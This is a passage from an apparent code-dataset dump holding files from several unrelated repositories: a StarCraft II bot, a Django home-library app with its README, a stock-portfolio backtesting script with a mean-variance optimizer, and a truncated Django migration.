self.ITERATIONS_PER_MINUTE = 165\n self.MAX_WORKERS = 50\n\n async def on_step(self, iteration):\n self.iteration = iteration\n\n await self.render_visualization()\n await self.scout()\n await self.distribute_workers()\n await self.build_workers()\n await self.build_pylons()\n await self.build_assimilators()\n await self.expand()\n await self.build_tech()\n await self.build_army()\n await self.attack()\n\n async def render_visualization(self):\n game_data = np.zeros((self.game_info.map_size[1], self.game_info.map_size[0], 3), np.uint8)\n\n # UNIT: [SIZE, (BGR COLOR)]\n unit_dims = {\n NEXUS: [15, (0, 255, 0)],\n PYLON: [3, (20, 235, 0)],\n PROBE: [1, (55, 200, 0)],\n\n ASSIMILATOR: [2, (55, 200, 0)], \n GATEWAY: [3, (200, 100, 0)],\n CYBERNETICSCORE: [3, (150, 150, 0)],\n STARGATE: [5, (255, 0, 0)],\n VOIDRAY: [3, (255, 100, 0)],\n }\n \n for unit_type in unit_dims:\n for unit in self.units(unit_type).ready:\n pos = unit.position\n cv2.circle(game_data, (int(pos[0]), int(pos[1])), 
unit_dims[unit_type][0], unit_dims[unit_type][1], -1)\n\n\n flipped = cv2.flip(game_data, 0)\n resized = cv2.resize(flipped, dsize=None, fx=2, fy=2)\n\n cv2.imshow('Visualization', resized)\n cv2.waitKey(1)\n\n async def build_workers(self):\n if (len(self.units(NEXUS)) * 16) > len(self.units(PROBE)) and len(self.units(PROBE)) < self.MAX_WORKERS:\n for nexus in self.units(NEXUS).ready.noqueue:\n if self.can_afford(PROBE):\n await self.do(nexus.train(PROBE))\n\n\n async def build_pylons(self):\n if self.supply_left < 5 and not self.already_pending(PYLON):\n nexuses = self.units(NEXUS).ready\n if nexuses.exists:\n if self.can_afford(PYLON):\n await self.build(PYLON, near=nexuses.first)\n\n async def build_assimilators(self):\n for nexus in self.units(NEXUS).ready:\n vaspenes = self.state.vespene_geyser.closer_than(15.0, nexus)\n for vaspene in vaspenes:\n if not self.can_afford(ASSIMILATOR):\n break\n worker = self.select_build_worker(vaspene.position)\n if worker is None:\n break\n if not self.units(ASSIMILATOR).closer_than(1.0, vaspene).exists:\n await self.do(worker.build(ASSIMILATOR, vaspene))\n\n async def expand(self):\n if self.units(NEXUS).amount < (self.iteration / self.ITERATIONS_PER_MINUTE) and self.can_afford(NEXUS):\n await self.expand_now()\n\n async def build_tech(self):\n #print(self.iteration / self.ITERATIONS_PER_MINUTE)\n if self.units(PYLON).ready.exists:\n pylon = self.units(PYLON).ready.random\n\n if self.units(GATEWAY).ready.exists and not self.units(CYBERNETICSCORE):\n if self.can_afford(CYBERNETICSCORE) and not self.already_pending(CYBERNETICSCORE):\n await self.build(CYBERNETICSCORE, near=pylon)\n\n elif len(self.units(GATEWAY)) < 1:\n if self.can_afford(GATEWAY) and not self.already_pending(GATEWAY):\n await self.build(GATEWAY, near=pylon)\n\n if self.units(CYBERNETICSCORE).ready.exists:\n if len(self.units(STARGATE)) < ((self.iteration / self.ITERATIONS_PER_MINUTE)):\n if self.can_afford(STARGATE) and not self.already_pending(STARGATE):\n 
await self.build(STARGATE, near=pylon)\n\n async def build_army(self):\n for gw in self.units(GATEWAY).ready.noqueue:\n if not self.units(STALKER).amount > self.units(VOIDRAY).amount:\n if self.can_afford(STALKER) and self.supply_left > 0:\n await self.do(gw.train(STALKER))\n\n for sg in self.units(STARGATE).ready.noqueue:\n if self.can_afford(VOIDRAY) and self.supply_left > 0:\n await self.do(sg.train(VOIDRAY))\n\n def find_target(self, state):\n if self.known_enemy_units:\n return random.choice(self.known_enemy_units)\n elif self.known_enemy_structures:\n return random.choice(self.known_enemy_structures)\n else:\n return self.enemy_start_locations[0]\n\n async def attack(self):\n # {UNIT: [n to fight, n to defend]}\n attack_units = {VOIDRAY: [8, 3]}\n\n for UNIT in attack_units:\n if self.units(UNIT).amount > attack_units[UNIT][0] and self.units(UNIT).amount > attack_units[UNIT][1]:\n for s in self.units(UNIT).idle:\n await self.do(s.attack(self.find_target(self.state)))\n\n elif self.units(UNIT).amount > attack_units[UNIT][1]:\n if self.known_enemy_units:\n for s in self.units(UNIT).idle:\n await self.do(s.attack(random.choice(self.known_enemy_units)))\n\n\nrun_game(maps.get(\"AbyssalReefLE\"), [\n Bot(Race.Protoss, ArjBot()),\n Computer(Race.Terran, Difficulty.Hard)\n ], realtime=False)" }, { "alpha_fraction": 0.7058823704719543, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 17, "blob_id": "292812abbe00a3c14fc15d487c7ef7daf2e3c071", "content_id": "3a1fab56d654c15b82dbbb4316ad487c336289e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 17, "license_type": "no_license", "max_line_length": 17, "num_lines": 1, "path": "/README.md", "repo_name": "arjunsv/sc2-deepmind-ai", "src_encoding": "UTF-8", "text": "# sc2-deepmind-ai" } ]
3
Larisa1992/HW-D6-Library
https://github.com/Larisa1992/HW-D6-Library
28983cf77306a2151d7ceafad98cdbb964783985
5458b35a32a3977ae306775858f003b3ede516b8
3778b8991bbb8cf0e0a445f304ae6f0cd32fa647
refs/heads/master
2022-12-08T13:02:13.016623
2020-09-03T21:02:17
2020-09-03T21:02:17
292,100,144
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7226013541221619, "alphanum_fraction": 0.7258129119873047, "avg_line_length": 58.30952453613281, "blob_id": "c5a3587cea2d27136afd479acc6686be891ae063", "content_id": "fb7425b8784a7ca4bb8258cda96039ed2bc5fd7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2801, "license_type": "no_license", "max_line_length": 220, "num_lines": 42, "path": "/my_site/urls.py", "repo_name": "Larisa1992/HW-D6-Library", "src_encoding": "UTF-8", "text": "\"\"\"my_site URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom p_library.views import AuthorEdit, AuthorList, author_create_many, books_authors_create_many, FriendList, FriendEdit, friends_books, BookList, book_edit, books_list, index, book_increment, book_decrement, publishing\n\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', books_list), # books_list - метод, который будет исполнятся при запросе URL в первом аргументе\n path('index/', index, name='all_book'),\n path('index/book_increment/', book_increment),\n path('index/book_decrement/', book_decrement),\n path('index/publishing/', publishing),\n path('author/create', AuthorEdit.as_view(), name='author_create'),\n path('authors', AuthorList.as_view(), name='author_list'),\n path('author/create_many', author_create_many, name='author_create_many'),\n path('author_book/create_many', books_authors_create_many, name='author_book_create_many'), #books_authors_create_many вызываем метод из файла view.py\n path('friends/', FriendList.as_view(), name='friend_list'), # выводим список друзей и переходим в форму создания друга и форму выдачи книг друзьям\n path('friend/create', FriendEdit.as_view(), name='friend_create'), # формма создания друга\n path('friends/books', friends_books, name='friends_books'), # формма создания друга\n path('books', BookList.as_view(), name='books_list'), # форма просмотра всех книг с уточнением, у кого книга. 
\n path('book/edit/<int:book_id>/', book_edit, name='book_edit'), # форма редактирования книги, можно отдать книгу другу\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) # для статических медиа файлов\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) # для файлов стилей\n" }, { "alpha_fraction": 0.7904683351516724, "alphanum_fraction": 0.8069022297859192, "avg_line_length": 38.25806427001953, "blob_id": "6d3aab2ad5be0dece1f6b6ea0915bba05c2bffd3", "content_id": "14570e5cca4f0e24ddc9acdcdf8167ab0b722536", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2013, "license_type": "no_license", "max_line_length": 188, "num_lines": 31, "path": "/README.md", "repo_name": "Larisa1992/HW-D6-Library", "src_encoding": "UTF-8", "text": "# HW-D6-Library\nHome Work for module d6 (static and base.html)\n\nРазворачиваем проект:\n1) скачайте репозиторий в вирутальное окружение\n\n2) установите пакеты, используемые в проекте командой\npip install -r requirements.txt\n\n3) запустите проект командой\npython manage.py runserver\n\nОписание функционала\n1) для входа под администратором используйте данные\nЛогин: admin\nПароль: django\n(если будут ошибки, попробуйте создать своего суперпользователя - как это сделать, описано в курсе)\n\nВойдя под администратором, можно создавать все объекты проекта - авторов, книги, издательства и друзей\n\n2) Главная страница проекта расположена по пути \"index/\" (http://127.0.0.1:8000/index/)\n\nВ базовом шаблоне задана шапка сайтас тремя ссылками:\nMy personal library\nMy friends\nMy books\n\n3) для проверки пункта 3 домашнего задания (\"Добавьте в модель книги возможность загружать картинки к книгам (в этом задании допускается сделать это через панель администратора)\")\nперейдите по ссылке \"My books\" в шапке проекта с любой страницы и нажмите \"Редактировать\" для любой книги. 
Перед кнопкой \"Сохранить\" есть действие \"Выберите файл\" для загрузки изображения.\n\n4) После сохранения книги выполняется переадресация на список книг (My books)\n" } ]
2
wayRaimy/Backtesting-of-MVO-portfolio
https://github.com/wayRaimy/Backtesting-of-MVO-portfolio
a516f006f3b982b38c75db637562f144d03eb892
6e86f679f34c21d08b1b0f0d1521918fdcdc3802
1e6f760db2beec395990416eda88ddb166b583f0
refs/heads/master
2023-04-19T01:14:00.765004
2019-12-22T16:02:31
2019-12-22T16:02:31
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5296229720115662, "alphanum_fraction": 0.5423898100852966, "avg_line_length": 25.956989288330078, "blob_id": "dfbd14929ce85cef4fc41ee16c11a00ce627e04a", "content_id": "43a7c87d0476ef0af9bfec63af65dfe8c12c8192", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5013, "license_type": "permissive", "max_line_length": 82, "num_lines": 186, "path": "/backtesting.py", "repo_name": "wayRaimy/Backtesting-of-MVO-portfolio", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport optimizer as opt\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\n\n\nstocks = ['PTT', 'CPALL', 'SCC', 'BDMS', 'AOT']\nMONEY = 1000000\nFEE = 0.0015\n\n# import and clean data\ndf = opt.getStockDataFrame(stocks)\ndf.at[datetime.strptime('1/2/2009', '%m/%d/%Y'), 'PTT'] = 17.5\ndf.at[datetime.strptime('7/6/2009', '%m/%d/%Y'), 'PTT'] = 22.7\n\n\ndef plot_monthly_with_fee():\n volume = {name: 0 for name in stocks}\n weight = {name: 0 for name in stocks}\n\n money = MONEY\n tem = 0\n\n plt_day = []\n plt_val = []\n\n for index, row in enumerate(df.iterrows()):\n date = row[0]\n price = row[1]\n\n # calculate every month or every year\n routine = date.day\n if routine < tem:\n\n # calculate total money by selling all\n for stock in stocks:\n money += volume[stock] * price[stock]\n\n weight = opt.allocate(df.iloc[:index])\n \n # calculate new volume\n for stock in stocks:\n available = weight[stock] * money\n volume[stock] = (available * (1 - FEE)) / price[stock]\n money -= available\n \n plt_day += [date]\n plt_val += [money + sum(volume[stock] * price[stock] for stock in stocks)]\n tem = routine\n plt.plot(plt_day, plt_val, label='monthly with fee')\n\n\ndef plot_monthly_without_fee():\n volume = {name: 0 for name in stocks}\n weight = {name: 0 for name in stocks}\n\n money = MONEY\n tem = 0\n\n plt_day = []\n plt_val = []\n\n for index, row in enumerate(df.iterrows()):\n date = row[0]\n price = 
row[1]\n\n # calculate every month or every year\n routine = date.day\n if routine < tem:\n\n # calculate total money by selling all\n for stock in stocks:\n money += volume[stock] * price[stock]\n\n weight = opt.allocate(df.iloc[:index])\n \n # calculate new volume\n for stock in stocks:\n available = weight[stock] * money\n volume[stock] = available / price[stock]\n money -= available\n \n plt_day += [date]\n plt_val += [money + sum(volume[stock] * price[stock] for stock in stocks)]\n tem = routine\n plt.plot(plt_day, plt_val, label='monthly without fee')\n\n\ndef plot_annually_with_fee():\n volume = {name: 0 for name in stocks}\n weight = {name: 0 for name in stocks}\n\n money = MONEY\n tem = 0\n\n plt_day = []\n plt_val = []\n\n for index, row in enumerate(df.iterrows()):\n date = row[0]\n price = row[1]\n\n # calculate every month or every year\n routine = date.month\n if routine < tem:\n\n # calculate total money by selling all\n for stock in stocks:\n money += volume[stock] * price[stock]\n\n weight = opt.allocate(df.iloc[:index])\n \n # calculate new volume\n for stock in stocks:\n available = weight[stock] * money\n volume[stock] = (available * (1 - FEE)) / price[stock]\n money -= available\n \n plt_day += [date]\n plt_val += [money + sum(volume[stock] * price[stock] for stock in stocks)]\n tem = routine\n plt.plot(plt_day, plt_val, label='yearly with fee')\n\n\ndef plot_annually_without_fee():\n volume = {name: 0 for name in stocks}\n weight = {name: 0 for name in stocks}\n\n money = MONEY\n tem = 0\n\n plt_day = []\n plt_val = []\n\n for index, row in enumerate(df.iterrows()):\n date = row[0]\n price = row[1]\n\n # calculate every month or every year\n routine = date.month\n if routine < tem:\n\n # calculate total money by selling all\n for stock in stocks:\n money += volume[stock] * price[stock]\n\n weight = opt.allocate(df.iloc[:index])\n \n # calculate new volume\n for stock in stocks:\n available = weight[stock] * money\n volume[stock] = available / 
price[stock]\n money -= available\n \n plt_day += [date]\n plt_val += [money + sum(volume[stock] * price[stock] for stock in stocks)]\n tem = routine\n plt.plot(plt_day, plt_val, label='yearly without fee')\n\n\ndef plot_set_index():\n money = MONEY\n volume = 0\n plt_day = []\n plt_val = []\n data = pd.read_csv(\"SET50.csv\", index_col=0)\n for date, price in data.iterrows():\n plt_day += [datetime.strptime(date, '%Y-%m-%dT%H:%M:%S')]\n\n if money >= price['Close']:\n volume = money / price['Close']\n money = 0\n\n plt_val += [volume * price['Close']]\n\n plt.plot(plt_day, plt_val, label='SET50')\n \n\nplot_monthly_with_fee()\nplot_monthly_without_fee()\nplot_annually_with_fee()\nplot_annually_without_fee()\nplot_set_index()\n\nplt.legend(bbox_to_anchor=(0.7, 0.3), loc='upper left', borderaxespad=0.)\nplt.show()" }, { "alpha_fraction": 0.7161290049552917, "alphanum_fraction": 0.7419354915618896, "avg_line_length": 43.28571319580078, "blob_id": "f3ab80fcae1cd11ce26e3312fe9a6fcd0d6f06bd", "content_id": "a9e5971f553fa0cfaeeb8572e1443522b0feb113", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 310, "license_type": "permissive", "max_line_length": 87, "num_lines": 7, "path": "/README.md", "repo_name": "wayRaimy/Backtesting-of-MVO-portfolio", "src_encoding": "UTF-8", "text": "# Backtesting-of-MVO-portfolio\n\nThis backtesting used `stocks = ['PTT', 'CPALL', 'SCC', 'BDMS', 'AOT']` as samples\nand visualized the profit/loss of the MVO portfolio in the period between 2009 and 2019\n\n### Rebalance result\n![](https://github.com/tongplw/Backtesting-of-MVO-portfolio/blob/master/example.png)\n" }, { "alpha_fraction": 0.5987460613250732, "alphanum_fraction": 0.6175548434257507, "avg_line_length": 29.11320686340332, "blob_id": "be1303c5c4b388f14459a9d279d6246063da122b", "content_id": "8660d02a108903bdf35895f390a330c98e7b82f3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, 
"language": "Python", "length_bytes": 1595, "license_type": "permissive", "max_line_length": 94, "num_lines": 53, "path": "/optimizer.py", "repo_name": "wayRaimy/Backtesting-of-MVO-portfolio", "src_encoding": "UTF-8", "text": "import datetime\nimport numpy as np\nimport pandas as pd\nimport pandas_datareader as pdr\nfrom scipy import optimize\n\n\ndef getStockDataFrame(stocks):\n \"\"\"Return data frame of daily stock's price\"\"\"\n stocks = [stock.strip()+'.BK' for stock in stocks]\n w = pd.DataFrame()\n t = []\n for s in stocks:\n data = pdr.get_data_yahoo(\n s, \n start=datetime.datetime(2009, 1, 1), \n end=datetime.datetime(2019, 1, 1),\n interval='d'\n )\n px = data[['Close']]\n t.append(px)\n w = pd.concat(t, axis=1, join='outer')\n w.columns = [name.split('.')[0] for name in stocks]\n return w\n\n\ndef allocate(stocks_dataframe):\n portfolio_size = len(stocks_dataframe.columns)\n returns = stocks_dataframe.pct_change()\n mean_return = np.array(returns.mean())\n annualized_return = np.round(mean_return * 252.0, 2)\n cov_matrix = np.multiply(returns.cov(), 252.0)\n\n def portfolio_return(x):\n return np.array(np.dot(x.T, annualized_return))\n\n def portfolio_var(x):\n return np.array((np.dot(np.dot(x.T, cov_matrix), x)))\n\n def target(x):\n return np.array(-1 * (0.1 * portfolio_return(x) - portfolio_var(x)))\n\n # Optimize\n initial_guess = np.random.random(portfolio_size)\n initial_guess = initial_guess / sum(initial_guess)\n out = optimize.minimize(target, initial_guess, bounds=tuple([(0.05, 1)] * portfolio_size))\n out.x = out.x / np.sum(np.abs(out.x))\n\n weights = {}\n for i in range(portfolio_size):\n weights[stocks_dataframe.columns[i]] = out.x[i]\n\n return weights" }, { "alpha_fraction": 0.6430678367614746, "alphanum_fraction": 0.6519173979759216, "avg_line_length": 21.66666603088379, "blob_id": "6015543d91b9bad3ef2430ed906c3fcdd27268f9", "content_id": "d23db3ad86e0657e87bcd9f6c4bd6dc99640877c", "detected_licenses": [ "MIT" ], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 339, "license_type": "permissive", "max_line_length": 63, "num_lines": 15, "path": "/test.py", "repo_name": "wayRaimy/Backtesting-of-MVO-portfolio", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\n\n\nplt_day = []\nplt_val = []\n\ndata = pd.read_csv(\"monthly.csv\", index_col=0)\nfor index, row in enumerate(data.iterrows()):\n plt_day += [datetime.strptime(row[0], '%Y-%m-%dT%H:%M:%S')]\n plt_val += [row[1]['Close']]\n\nplt.plot(plt_day, plt_val)\nplt.show()" } ]
4
moralfager/coinmarketpy
https://github.com/moralfager/coinmarketpy
b80a9039dda60a16d2b159b4c42ab6908b1d751e
60cce47e4165310f3c0a060bce4456fa5a50eec0
c2a49739414b55a3e2ed4c8018054c6d94b168b2
refs/heads/master
2023-08-16T02:27:45.341994
2021-10-11T02:41:45
2021-10-11T02:41:45
415,602,111
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.46023884415626526, "alphanum_fraction": 0.47606563568115234, "avg_line_length": 43.012821197509766, "blob_id": "1b3aa12551b3b12cb50782d01acc5402da95f5d8", "content_id": "4dd0440362102f9ec0c578e00265aafbede355c2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10299, "license_type": "permissive", "max_line_length": 115, "num_lines": 234, "path": "/src/coinmarket.py", "repo_name": "moralfager/coinmarketpy", "src_encoding": "UTF-8", "text": "import math\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport time\n\n\nclass CoinMarket:\n __DEFAULT_HEADERS = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0\",\n \"X-Requested-With\": \"XMLHttpRequest\"\n }\n\n def __init__(self, header=__DEFAULT_HEADERS):\n self.header = header\n\n def url_to_txt(self, txt, count_for_unique_urls=0):\n f = open(txt, 'w')\n urls = self.get_url()\n for url in range(len(urls)):\n unique_urls = f\"https://coinmarketcap.com{urls[url]}\\n\"\n f.write(unique_urls)\n count_for_unique_urls += 1\n print(f\"[INFO] => {count_for_unique_urls} elements entered into a {txt} file \")\n\n def get_url(self, count=0, quantity=-1):\n urls = []\n unique_url = []\n if quantity == -1:\n for i in range(1, self.count_of_page() + 1):\n url = f'https://coinmarketcap.com/?page={i}'\n bsoup = BeautifulSoup(requests.get(url, headers=self.header).content, 'lxml')\n tbody = bsoup.find(\"tbody\")\n all_tr = tbody.find_all(\"tr\")\n for item in all_tr:\n all_td = item.find_all(\"td\")\n for item1 in all_td:\n all_links = item1.find_all('a', class_=\"cmc-link\")\n for item2 in all_links:\n item_url = item2.get(\"href\").replace(\"markets/\", \"\").replace(\"?period=7d\", \"\")\n urls.append(item_url)\n count += 1\n print(f'{count} is done')\n urls = list(dict.fromkeys(urls))\n elif quantity >= 0:\n count_of_page = math.ceil(quantity / 100)\n print(count_of_page)\n for j in 
range(1, count_of_page + 1):\n url = f'https://coinmarketcap.com/?page={j}'\n bsoup = BeautifulSoup(requests.get(url, headers=self.header).content, 'lxml')\n tbody = bsoup.find(\"tbody\")\n all_tr = tbody.find_all(\"tr\")\n for item in all_tr:\n all_td = item.find_all(\"td\")\n for item1 in all_td:\n all_links = item1.find_all('a', class_=\"cmc-link\")\n for item2 in all_links:\n item_url = item2.get(\"href\").replace(\"markets/\", \"\").replace(\"?period=7d\", \"\")\n urls.append(item_url)\n count += 1\n print(f'{count} is done')\n urls = list(dict.fromkeys(urls))\n pop_count = 100 - (quantity % 100)\n print(pop_count)\n for i in range(pop_count):\n urls.pop()\n count_for_unique_urls = 0\n for url in range(len(urls)):\n temp = f\"https://coinmarketcap.com{urls[url]}\"\n unique_url.append(temp)\n count_for_unique_urls += 1\n print(f\"[INFO] => {count_for_unique_urls} elements\")\n return unique_url\n\n def count_of_page(self):\n page = self.find_count_of_crypto() / 100\n return math.ceil(page)\n\n def find_count_of_crypto(self):\n url = f'https://coinmarketcap.com/'\n soup = BeautifulSoup(requests.get(url, headers=self.header).content, 'lxml')\n div = soup.find('div', class_=\"sc-16r8icm-0 sc-4r7b5t-0 gJbsQH\")\n showing = div.find('p', class_=\"sc-1eb5slv-0 hykWbK\")\n return int(showing.text[-4:])\n\n def print_info(self, url, count, data, retry=10):\n currency = {'Cryptocurrencies': []}\n for i in range(1):\n try:\n response = requests.get(url=url, headers=self.header)\n result = response.content\n soup = BeautifulSoup(result, 'lxml')\n price_value = soup.find(class_=\"priceValue\")\n name = soup.find(\"span\", class_=\"sc-1eb5slv-0 sc-1308828-0 bwAAhr\")\n # name_symbol = soup.find(class_=\"nameSymbol\")\n stats = soup.find_all(class_=\"statsValue\")\n # usd_converter = soup.find_all(class_=\"sc-16r8icm-0 sc-1etv19d-4 iQGGZq\")\n\n # 0 - marcap 1 - full marcap 2 - volume24 3- volume/marcap 4 - circulating Supply\n currency['Cryptocurrencies'].append({\n 'ID': 
count,\n 'Name': name.text,\n 'Price': price_value.text,\n 'Market Capitalization': stats[0].text,\n 'Fully Diluted Market Cap': stats[1].text,\n 'Volume 24h': stats[2].text,\n 'Volume/Marcap': stats[3].text,\n 'Circulating Supply': stats[4].text\n })\n data.append(currency)\n print(currency)\n print(f'{count} {name.text} is [DONE]')\n except Exception as ex:\n time.sleep(15)\n if retry:\n print(f\"[INFO] retry = {retry} =>{url}\")\n return self.print_info(url, count, retry=(retry - 1), data=data)\n else:\n currency['Cryptocurrencies'].append({\n 'ID': count,\n 'Name': None,\n 'Price': None,\n 'Market Capitalization': None,\n 'Fully Diluted Market Cap': None,\n 'Volume 24h': None,\n 'Volume/Marcap': None,\n 'Circulating Supply': None\n })\n data.append(currency)\n print(currency)\n continue\n else:\n return response\n return data\n\n def info_to_json(self, url, count, retry=15):\n currency = {'Cryptocurrencies': []}\n for i in range(1):\n try:\n response = requests.get(url=url, headers=self.header)\n result = response.content\n soup = BeautifulSoup(result, 'lxml')\n price_value = soup.find(class_=\"priceValue\")\n name = soup.find(\"span\", class_=\"sc-1eb5slv-0 sc-1308828-0 bwAAhr\")\n # name_symbol = soup.find(class_=\"nameSymbol\")\n stats = soup.find_all(class_=\"statsValue\")\n # usd_converter = soup.find_all(class_=\"sc-16r8icm-0 sc-1etv19d-4 iQGGZq\")\n\n # 0 - marcap 1 - full marcap 2 - volume24 3- volume/marcap 4 - circulating Supply\n currency['Cryptocurrencies'].append({\n 'ID': count,\n 'Name': name.text,\n 'Price': price_value.text,\n 'Market Capitalization': stats[0].text,\n 'Fully Diluted Market Cap': stats[1].text,\n 'Volume 24h': stats[2].text,\n 'Volume/Marcap': stats[3].text,\n 'Circulating Supply': stats[4].text\n })\n print(f'{count} {name.text} is [DONE]')\n with open('CoinMarket.json', 'w') as file:\n json.dump(currency, file, indent=4, ensure_ascii=False)\n except Exception as ex:\n time.sleep(15)\n if retry:\n print(f\"[INFO] retry = 
{retry} =>{url}\")\n return self.info_to_json(url, count, retry=(retry - 1))\n else:\n currency['Cryptocurrencies'].append({\n 'ID': count,\n 'Name': None,\n 'Price': None,\n 'Market Capitalization': None,\n 'Fully Diluted Market Cap': None,\n 'Volume 24h': None,\n 'Volume/Marcap': None,\n 'Circulating Supply': None\n\n })\n with open('CoinMarket.json', 'w') as file:\n json.dump(currency, file, indent=4, ensure_ascii=False)\n f = open('ex_log.txt', 'w')\n f.write(f\"{count} {url}\\n\")\n continue\n else:\n return response\n\n def get_top(self, quantity):\n data = []\n all_information = self.get_url(quantity=quantity)\n count = 1\n for all_info in all_information:\n self.print_info(url=all_info, count=count, data=data)\n count += 1\n\n def get_all_info(self):\n data = []\n all_information = self.get_url()\n count = 1\n for all_info in all_information:\n self.print_info(url=all_info, count=count, data=data)\n count += 1\n print(data)\n\n def get_news(self, coin_name):\n result_list = []\n while True:\n total_count = self.find_count_of_crypto()\n responce = requests.get(url=f'https://api.coinmarketcap.com/data-api/v3/cryptocurrency/listing?start=1'\n f'&limit={total_count}&sortBy=market_cap&'\n f'sortType=desc&convert=USD&cryptoType=all&tagType=all&audited=false')\n data = responce.json()\n for i in range(0, total_count):\n result_list.append({\n 'id': data['data']['cryptoCurrencyList'][i]['id'],\n 'name': data['data']['cryptoCurrencyList'][i]['name']\n })\n print(result_list)\n for i in range(0, total_count):\n if 'name' == 'Bitcoin' in result_list:\n print(result_list.get('id'))\n for i in range(len(result_list)):\n if result_list[i]['name'] == coin_name.lower().title():\n coin_id = result_list[i]['id']\n urls = f'https://api.coinmarketcap.com/content/v3/news?coins={coin_id}'\n res = requests.get(url=urls)\n data_news = res.json()\n data_news_json = []\n for i in range(0, len(data_news['data'])):\n data_news_json.append({\n 'News title': 
data_news['data'][i]['meta']['title'],\n 'Text': data_news['data'][i]['meta']['subtitle']\n })\n return data_news_json\n" }, { "alpha_fraction": 0.6646115779876709, "alphanum_fraction": 0.7139334082603455, "avg_line_length": 40.589744567871094, "blob_id": "cf42aea372c7252a83641b15756224ecb4e28fc0", "content_id": "9c304fc14cd9b7233c9dc3c0a61df2cf8778e9cf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1624, "license_type": "permissive", "max_line_length": 619, "num_lines": 39, "path": "/README.md", "repo_name": "moralfager/coinmarketpy", "src_encoding": "UTF-8", "text": "# CoinMarket scrapper\n\n\n\n### Installation\n```bash\ngit clone https://github.com/moralfager/coinmarketpy.git\n```\n\n### Usage\n\n```python\nfrom coinmarketpy.src.coinmarket import CoinMarket\ncm = CoinMarket()\n```\n\n### Examples\nUsage examples:\n```python\n# getting all url, if quantity not provided\n>>> cm.get_url(quantity=1)\n['https://coinmarketcap.com/currencies/bitcoin/']\n>>> cg.get_price(ids='bitcoin,litecoin,ethereum', vs_currencies='usd')\n# News about crypto\n>>> cm.get_news('Bitcoin')\n[{'News title': 'US Senator Reveals That She Had Stacked Up $100K Worth Of BTC In August', 'Text': 'Senator Cynthia Lummis revealed through a filing that she had purchased bitcoin in August. The value of her BTC purchase is worth between $50K to $100K. Senator Lummis is one of the pro-crypto members of the senate, notably saying that she would like bitcoin to form “part of a di...'}, {'News title': 'Voting period for Mt. Gox civil rehabilitation plan finally ends', 'Text': 'Tokyo-based crypto exchange Mt. Gox shut down in 2014 after it lost Bitcoin (BTC) worth $450 million at the time... 
Continue reading \\n'}]\n# Printing all information about currencies\n>>> cm.get_all_info()\n# List of top by market cap\n>>> cm.get_top(quantity=1)\n{'Cryptocurrencies': [{'ID': 1, 'Name': 'Bitcoin', 'Price': '$55,366.58', 'Market Capitalization': '$1,043,102,852,155', 'Fully Diluted Market Cap': '$1,162,698,149,960', 'Volume 24h': '$35,633,816,402', 'Volume/Marcap': '0.03416', 'Circulating Supply': '18,839,937.00 BTC'}]}\n\n```\n\n### API documentation\nhttps://coinmarketcap.com/api/\n\n## License\n[MIT](https://choosealicense.com/licenses/mit/)\n" } ]
2
Tomaszdud/ZaplanujWorkout
https://github.com/Tomaszdud/ZaplanujWorkout
72706e096e8df8587c3410c883756b411117a9c3
293a7afebe2c3faa4eab899b45b6e333bd7c7a92
08ee75ed716f4b0da73bc3ccbd9a700c99a73256
refs/heads/master
2020-06-04T08:42:01.341711
2019-06-18T14:06:45
2019-06-18T14:06:45
191,949,554
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5392540097236633, "alphanum_fraction": 0.550266444683075, "avg_line_length": 41.65151596069336, "blob_id": "b9fcc6de6e2bb0418cddbed5804cc0e64e81e67c", "content_id": "e0e2b755da8d15d3f06f5d6f338f8e76a96f264c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2815, "license_type": "no_license", "max_line_length": 142, "num_lines": 66, "path": "/jedzonko/migrations/0001_initial.py", "repo_name": "Tomaszdud/ZaplanujWorkout", "src_encoding": "UTF-8", "text": "# Generated by Django 2.0 on 2019-05-07 20:42\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='DayName',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=16, unique=True)),\n ('order', models.SmallIntegerField(unique=True)),\n ],\n ),\n migrations.CreateModel(\n name='Page',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, 